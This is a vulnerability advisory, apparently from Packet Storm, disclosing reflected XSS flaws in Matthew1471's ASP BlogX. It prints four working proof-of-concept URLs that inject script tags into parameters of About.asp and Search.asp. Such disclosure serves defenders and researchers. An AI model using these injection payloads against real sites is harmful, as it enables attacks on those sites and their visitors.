Matthew1471s ASP BlogX suffers from a cross site scripting vulnerability.
278ceb4d4521a0d480bdb5620b3f83a5315dd44c0864b48c673fe27f962b2c8fTitle: Matthew1471s ASP BlogX - XSS Vulnerabilities
Software : Matthew1471s ASP BlogX
Software Version : 12 August 2008
Vendor: http://blogx.co.uk/
Vulnerability Published : 2012-03-26
Vulnerability Update Time :
Status :
Impact : Medium(CVSS2 Base : 5.0, AV:N/AC:L/Au:N/C:P/I:N/A:N)
Bug Description :
Matthew1471s ASP BlogX(version update : 12 August 2008) is vulnerable to XSS.
Proof Of Concept :
1)ShowOriginal in About.asp , PoC:
http://VICTIM/About.asp?ShowOriginal="><SCRIPT>alert("demonalex");</SCRIPT>&ShowNew=a&ShowChanges=b
2)ShowNew in About.asp , PoC:
http://VICTIM/About.asp?ShowOriginal=Y&ShowNew="><SCRIPT>alert("demonalex");</SCRIPT>&ShowChanges=b
3)ShowChanges in About.asp , PoC:
http://VICTIM/About.asp?ShowOriginal=Y&ShowNew=a&ShowChanges="><SCRIPT>alert("demonalex");</SCRIPT>
4)Search in Search.asp , PoC:
http://VICTIM/Search.asp?Search=</title><SCRIPT>alert("demonalex");</SCRIPT>&Page=0
Credits : This vulnerability was discovered by demonalex(at)163(dot)com
mail: demonalex(at)163(dot)com / ChaoYi.Huang@connect.polyu.hk
Pentester/Researcher
Dark2S Security Team/PolyU.HK
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed